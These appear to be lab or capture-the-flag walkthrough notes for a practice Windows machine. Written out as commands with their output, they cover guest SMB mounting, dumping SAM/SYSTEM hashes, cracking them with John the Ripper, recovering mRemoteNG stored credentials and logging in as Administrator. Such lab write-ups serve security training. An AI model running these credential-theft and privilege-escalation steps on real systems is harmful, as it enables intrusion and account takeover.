[*] ssh found on tcp/22.



[*] msrpc found on tcp/135.



[*] netbios-ssn found on tcp/139.



[*] microsoft-ds found on tcp/445.



[*] http found on tcp/5985.



[*] http found on tcp/47001.



[*] msrpc found on tcp/49664.



[*] msrpc found on tcp/49665.



[*] msrpc found on tcp/49666.



[*] msrpc found on tcp/49667.



[*] msrpc found on tcp/49668.



[*] msrpc found on tcp/49669.



[*] msrpc found on tcp/49670.


=======

[+] Mounted //10.10.10.134/Backups using mount_smbfs: mount_smbfs -N //guest@10.10.10.134/Backups Backups/

[+] Found .VHD files on //10.10.10.134/Backups, mounted using Parallels Mounter.

[+] Grabbed SYSTEM and SAM from Windows/system32/config/

[+] Dumped NTLM hashes using samdump2: samdump2 SYSTEM SAM

[+] Cracked hashes with JTR: john --format=NT --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt NTLM-Hashes

[+] SSH'd as L4mpje:bureaulampje

[?] Something suspicious: 
InstallLocation    REG_SZ    C:\Program Files (x86)\mRemoteNG\

[-] Hijackable DLL:
C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll

[+] type $env:appdata/mRemoteNg/confCons.xml
Username="Administrator" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

[+] python3 mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
Password: thXLHM96BeKL0ER2

[+] SSH'd as Administrator:thXLHM96BeKL0ER2